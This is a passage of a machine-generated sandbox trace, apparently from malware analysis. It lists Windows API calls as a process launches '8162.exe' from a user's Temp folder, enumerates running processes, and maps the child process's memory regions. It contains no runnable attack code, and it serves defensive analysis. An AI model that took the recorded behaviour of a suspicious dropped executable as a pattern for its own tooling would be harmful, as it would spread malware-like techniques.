lpBuffer="C:\\Users\\hJrD1KOKY DS8lUjv\\AppData\\Local\\Temp\\8162.exe", lpFilePart=0x0) returned 0x36 [0101.732] GetLastError () returned 0x0 [0101.732] SetErrorMode (uMode=0x1) returned 0x1 [0101.732] GetFileAttributesExW (in: lpFileName="C:\\Users\\hJrD1KOKY DS8lUjv\\AppData\\Local\\Temp\\8162.exe", fInfoLevelId=0x0, lpFileInformation=0x5fcf0e0 | out: lpFileInformation=0x5fcf0e0) returned 1 [0101.733] GetLastError () returned 0x0 [0101.733] SetErrorMode (uMode=0x1) returned 0x1 [0101.733] GetLongPathNameW (in: lpszShortPath="C:\\Users\\HJRD1K~1\\", lpszLongPath=0x5fcec00, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\hJrD1KOKY DS8lUjv\\") returned 0x1b [0101.734] GetLastError () returned 0x0 [0101.734] GetFullPathNameW (in: lpFileName="C:\\Users\\hJrD1KOKY DS8lUjv\\AppData\\Local\\Temp\\8162.exe", nBufferLength=0x105, lpBuffer=0x5fcec28, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\hJrD1KOKY DS8lUjv\\AppData\\Local\\Temp\\8162.exe", lpFilePart=0x0) returned 0x36 [0101.734] GetLastError () returned 0x0 [0101.734] SetErrorMode (uMode=0x1) returned 0x1 [0101.734] GetFileAttributesExW (in: lpFileName="C:\\Users\\hJrD1KOKY DS8lUjv\\AppData\\Local\\Temp\\8162.exe", fInfoLevelId=0x0, lpFileInformation=0x5fcf0a8 | out: lpFileInformation=0x5fcf0a8) returned 1 [0101.735] GetLastError () returned 0x0 [0101.735] SetErrorMode (uMode=0x1) returned 0x1 [0101.738] GetFullPathNameW (in: lpFileName="C:\\Users\\hJrD1KOKY DS8lUjv\\Desktop", nBufferLength=0x105, lpBuffer=0x5fce9dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\hJrD1KOKY DS8lUjv\\Desktop", lpFilePart=0x0) returned 0x22 [0101.738] GetLastError () returned 0x0 [0101.738] SetErrorMode (uMode=0x1) returned 0x1 [0101.738] GetFileAttributesExW (in: lpFileName="C:\\Users\\hJrD1KOKY DS8lUjv\\Desktop", fInfoLevelId=0x0, lpFileInformation=0x2d2ba24 | out: lpFileInformation=0x2d2ba24) returned 1 [0101.739] GetLastError () returned 0x0 [0101.739] SetErrorMode (uMode=0x1) returned 0x1 [0101.739] GetFullPathNameW (in: lpFileName="C:\\Users\\hJrD1KOKY DS8lUjv\\Desktop", nBufferLength=0x105, lpBuffer=0x5fce9e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\hJrD1KOKY DS8lUjv\\Desktop", lpFilePart=0x0) returned 0x22 [0101.739] GetLastError () returned 0x0 [0101.739] SetErrorMode (uMode=0x1) returned 0x1 [0101.739] GetFileAttributesExW (in: lpFileName="C:\\Users\\hJrD1KOKY DS8lUjv\\Desktop", fInfoLevelId=0x0, lpFileInformation=0x2d2bbd4 | out: lpFileInformation=0x2d2bbd4) returned 1 [0101.740] GetLastError () returned 0x0 [0101.740] SetErrorMode (uMode=0x1) returned 0x1 [0101.741] LocalAlloc (uFlags=0x0, uBytes=0x5c) returned 0x2cd2e8 [0101.741] RtlMoveMemory (in: Destination=0x2cd2e8, Source=0x2d26f80, Length=0x5c | out: Destination=0x2cd2e8) [0101.741] LocalAlloc (uFlags=0x0, uBytes=0x46) returned 0x2b7e10 [0101.741] RtlMoveMemory (in: Destination=0x2b7e10, Source=0x2d2ce08, Length=0x46 | out: Destination=0x2b7e10) [0101.840] LocalFree (hMem=0x2cd2e8) returned 0x0 [0101.840] GetLastError () returned 0x0 [0101.841] LocalFree (hMem=0x2b7e10) returned 0x0 [0101.841] GetLastError () returned 0x0 [0101.845] NtQueryInformationProcess (in: ProcessHandle=0x61c, ProcessInformationClass=0x0, ProcessInformation=0x2d2d324, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0x2d2d324, ReturnLength=0x0) returned 0x0 [0101.848] EnumProcesses (in: lpidProcess=0x2d2d348, cb=0x400, lpcbNeeded=0x5fcf1fc | out: lpidProcess=0x2d2d348, lpcbNeeded=0x5fcf1fc) returned 1 [0101.850] GetLastError () returned 0x0 [0102.212] SetEvent (hEvent=0x3dc) returned 1 [0102.212] GetLastError () returned 0x0 [0102.212] SetEvent (hEvent=0x3d0) returned 1 [0102.212] GetLastError () returned 0x0 [0102.212] SetEvent (hEvent=0x3d4) returned 1 [0102.212] GetLastError () returned 0x0 [0102.213] SetEvent (hEvent=0x3d8) returned 1 [0102.213] GetLastError () returned 0x0 [0102.213] SetEvent (hEvent=0x3ec) returned 1 [0102.213] GetLastError () returned 0x0 [0102.213] SetEvent (hEvent=0x3e0) returned 1 [0102.213] GetLastError () returned 0x0 [0102.213] SetEvent (hEvent=0x3e4) returned 1 [0102.213] GetLastError () returned 0x0 [0102.214] SetEvent (hEvent=0x3e8) returned 1 [0102.214] GetLastError () returned 0x0 [0102.214] SetEvent (hEvent=0x3f0) returned 1 [0102.219] GetLastError () returned 0x0 [0102.222] CoUninitialize () Thread: id = 31 os_tid = 0xae8 Thread: id = 32 os_tid = 0xaec Thread: id = 33 os_tid = 0xaf0 Thread: id = 34 os_tid = 0xaf4 Thread: id = 35 os_tid = 0xb78 Thread: id = 36 os_tid = 0xb7c [0084.273] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0084.275] ResetEvent (hEvent=0x428) returned 1 [0084.275] GetLastError () returned 0x0 Thread: id = 37 os_tid = 0xb94 [0097.488] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0097.506] ShellExecuteExW (in: pExecInfo=0x2cba08c*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Users\\HJRD1K~1\\AppData\\Local\\Temp\\8162.exe", lpParameters=0x0, lpDirectory="C:\\Users\\hJrD1KOKY DS8lUjv\\Desktop", nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x2cba08c*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Users\\HJRD1K~1\\AppData\\Local\\Temp\\8162.exe", lpParameters=0x0, lpDirectory="C:\\Users\\hJrD1KOKY DS8lUjv\\Desktop", nShow=1, hInstApp=0x5, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 0 [0097.734] GetLastError () returned 0xd8 [0097.734] CoGetContextToken (in: pToken=0x65cf668 | out: pToken=0x65cf668) returned 0x0 [0097.735] CoUninitialize () Thread: id = 38 os_tid = 0xb9c [0101.751] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0101.753] ShellExecuteExW (in: pExecInfo=0x2d2d1e4*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Users\\HJRD1K~1\\AppData\\Local\\Temp\\8162.exe", lpParameters=0x0, lpDirectory="C:\\Users\\hJrD1KOKY DS8lUjv\\Desktop", nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x2d2d1e4*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Users\\HJRD1K~1\\AppData\\Local\\Temp\\8162.exe", lpParameters=0x0, lpDirectory="C:\\Users\\hJrD1KOKY DS8lUjv\\Desktop", nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x61c)) returned 1 [0101.802] GetLastError () returned 0x0 [0101.803] CoGetContextToken (in: pToken=0x68bf6e8 | out: pToken=0x68bf6e8) returned 0x0 [0101.803] CoUninitialize () Thread: id = 40 os_tid = 0xba8 [0102.300] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0102.328] SetThreadUILanguage (LangId=0x0) returned 0x409 [0102.329] VirtualQuery (in: lpAddress=0x72ce330, lpBuffer=0x72cf330, dwLength=0x1c | out: lpBuffer=0x72cf330*(BaseAddress=0x72ce000, AllocationBase=0x6940000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0102.330] VirtualQuery (in: lpAddress=0x72ce44c, lpBuffer=0x72cf44c, dwLength=0x1c | out: lpBuffer=0x72cf44c*(BaseAddress=0x72ce000, AllocationBase=0x6940000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0102.388] SetEvent (hEvent=0x5fc) returned 1 [0102.389] GetLastError () returned 0x0 [0102.389] SetEvent (hEvent=0x5f4) returned 1 [0102.389] GetLastError () returned 0x0 [0102.389] SetEvent (hEvent=0x608) returned 1 [0102.389] GetLastError () returned 0x0 [0102.389] SetEvent (hEvent=0x5fc) returned 1 [0102.390] GetLastError () returned 0x0 [0102.390] SetEvent (hEvent=0x5f4) returned 1 [0102.390] GetLastError () returned 0x0 [0102.390] SetEvent (hEvent=0x624) returned 1 [0102.390] GetLastError () returned 0x0 [0102.390] SetEvent (hEvent=0x5f8) returned 1 [0102.390] GetLastError () returned 0x0 [0102.391] SetEvent (hEvent=0x618) returned 1 [0102.391] GetLastError () returned 0x0 [0102.391] SetEvent (hEvent=0x620) returned 1 [0102.391] GetLastError () returned 0x0 [0102.391] SetEvent (hEvent=0x628) returned 1 [0102.410] GetLastError () returned 0x0 [0102.411] CoUninitialize () Process: id = "3" image_name = "8162.exe" filename = "c:\\users\\hjrd1k~1\\appdata\\local\\temp\\8162.exe" page_root = "0x64aee000" os_pid = "0xba0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa94" cmd_line = "\"C:\\Users\\HJRD1K~1\\AppData\\Local\\Temp\\8162.exe\" " cur_dir = "C:\\Users\\hJrD1KOKY DS8lUjv\\Desktop\\" os_username = "1R6PFH\\hJrD1KOKY DS8lUjv" os_groups = "1R6PFH\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e539" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 912 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 913 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 914 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 915 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 916 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 917 start_va = 0x190000 end_va = 0x193fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 918 start_va = 0x1100000 end_va = 0x1147fff entry_point = 0x1100000 region_type = mapped_file name = "8162.exe" filename = "\\Users\\HJRD1K~1\\AppData\\Local\\Temp\\8162.exe" (normalized: "c:\\users\\hjrd1k~1\\appdata\\local\\temp\\8162.exe") Region: id = 919 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 920 start_va = 0x77850000 end_va = 0x779cffff entry_point = 0x77850000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 921 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 922 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 923 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 924 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 925 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 926 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 927 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 928 start_va = 0x1e0000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 929 start_va = 0x73f80000 end_va = 0x73f87fff entry_point = 0x73f820f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 930 start_va = 0x73f90000 end_va = 0x73febfff entry_point = 0x73fcf798 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 931 start_va = 0x73ff0000 end_va = 0x7402efff entry_point = 0x7401de78 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 932 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 933 start_va = 0x2a0000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 934 start_va = 0x3a0000 end_va = 0x406fff entry_point = 0x3a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 935 start_va = 0x756c0000 end_va = 0x757cffff entry_point = 0x756d32d3 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 936 start_va = 0x75800000 end_va = 0x75845fff entry_point = 0x75807478 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 937 start_va = 0x77450000 end_va = 0x7756efff entry_point = 0x0 region_type = private name = "private_0x0000000077450000" filename = "" Region: id = 938 start_va = 0x77570000 end_va = 0x77669fff entry_point = 0x0 region_type = private name = "private_0x0000000077570000" filename = "" Region: id = 939 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 940 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 941 start_va = 0x530000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 945 start_va = 0x753a0000 end_va = 0x753abfff entry_point = 0x753a10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 946 start_va = 0x753b0000 end_va = 0x7540ffff entry_point = 0x753ca3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 947 start_va = 0x757d0000 end_va = 0x757e8fff entry_point = 0x757d4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 948 start_va = 0x75a50000 end_va = 0x75adffff entry_point = 0x75a66343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 949 start_va = 0x75c60000 end_va = 0x75d5ffff entry_point = 0x75c7b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 950 start_va = 0x75e80000 end_va = 0x75f6ffff entry_point = 0x75e90569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 951 start_va = 0x77140000 end_va = 0x771ebfff entry_point = 0x7714a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 952 start_va = 0x77310000 end_va = 0x773acfff entry_point = 0x77343fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 953 start_va = 0x773b0000 end_va = 0x7744ffff entry_point = 0x773c49e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 954 start_va = 0x77820000 end_va = 0x77829fff entry_point = 0x778236a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 955 start_va = 0x4d0000 end_va = 0x4dffff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 956 start_va = 0x540000 end_va = 0x6c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 957 start_va = 0x75630000 end_va = 0x7568ffff entry_point = 0x7564158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 958 start_va = 0x76fb0000 end_va = 0x7707bfff entry_point = 0x76fb168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 959 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 960 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 961 start_va = 0x6d0000 end_va = 0x850fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006d0000" filename = "" Region: id = 962 start_va = 0x1150000 end_va = 0x254ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001150000" filename = "" Region: id = 963 start_va = 0x75310000 end_va = 0x7538ffff entry_point = 0x753237c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 964 start_va = 0x860000 end_va = 0x9effff entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 965 start_va = 0x860000 end_va = 0x93efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000860000" filename = "" Region: id = 966 start_va = 0x9b0000 end_va = 0x9effff entry_point = 0x0 region_type = private name = "private_0x00000000009b0000" filename = "" Region: id = 967 start_va = 0x74c60000 end_va = 0x74c72fff entry_point = 0x74c61d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 968 start_va = 0x1a0000 end_va = 0x1a2fff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 969 start_va = 0x1a0000 end_va = 0x1a0fff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Thread: id = 39 os_tid = 0xba4 [0101.916] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0xcaa9b300, dwHighDateTime=0x1d2ffcc)) [0101.918] GetCurrentProcessId () returned 0xba0 [0101.918] GetCurrentThreadId () returned 0xba4 [0101.919] GetTickCount () returned 0x1f65f [0101.919] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=286274678) returned 1 [0101.919] GetStartupInfoW (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\HJRD1K~1\\AppData\\Local\\Temp\\8162.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x18ff84, hStdError=0x1104ae4)) [0101.919] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0101.920] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x756c0000 [0101.923] GetProcAddress (hModule=0x756c0000, lpProcName="FlsAlloc") returned 0x756d4f2b [0101.923] GetProcAddress (hModule=0x756c0000, lpProcName="FlsGetValue") returned 0x756d1252 [0101.924] GetProcAddress (hModule=0x756c0000, lpProcName="FlsSetValue") returned 0x756d4208 [0101.924] GetProcAddress (hModule=0x756c0000, lpProcName="FlsFree") returned 0x756d359f [0101.926] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x756c0000 [0101.927] GetCurrentThreadId () returned 0xba4 [0101.927] GetStartupInfoW (in: lpStartupInfo=0x18febc | out: lpStartupInfo=0x18febc*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\HJRD1K~1\\AppData\\Local\\Temp\\8162.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x110448d, hStdOutput=0x1104840, hStdError=0x5307d0)) [0101.927] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0101.927] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0101.927] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0101.927] SetHandleCount (uNumber=0x20) returned 0x20 [0101.927] GetCommandLineA () returned="\"C:\\Users\\HJRD1K~1\\AppData\\Local\\Temp\\8162.exe\" " [0101.928] GetEnvironmentStringsW () returned 0x2af0c8 [0101.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1536, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1536 [0101.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1536, lpMultiByteStr=0x5311f8, cbMultiByte=1536, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1536 [0101.928] FreeEnvironmentStringsW (penv=0x2af0c8) returned 1 [0101.928] GetLastError () returned 0x0 [0101.928] SetLastError (dwErrCode=0x0) [0101.929] GetLastError () returned 0x0 [0101.929] SetLastError (dwErrCode=0x0) [0101.929] GetLastError () returned 0x0 [0101.929] SetLastError (dwErrCode=0x0) [0101.929] GetACP () returned 0x4e4 [0101.929] GetLastError () returned 0x0 [0101.929] SetLastError (dwErrCode=0x0) [0101.929] IsValidCodePage (CodePage=0x4e4) returned 1 [0101.930] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0101.930] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0101.930] GetLastError () returned 0x0 [0101.930] SetLastError (dwErrCode=0x0) [0101.930] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0101.931] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0101.931] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0101.931] GetLastError () returned 0x0 [0101.931] SetLastError (dwErrCode=0x0) [0101.931] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0101.931] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ컸ĐĀ") returned 256 [0101.931] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ컸ĐĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0101.932] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 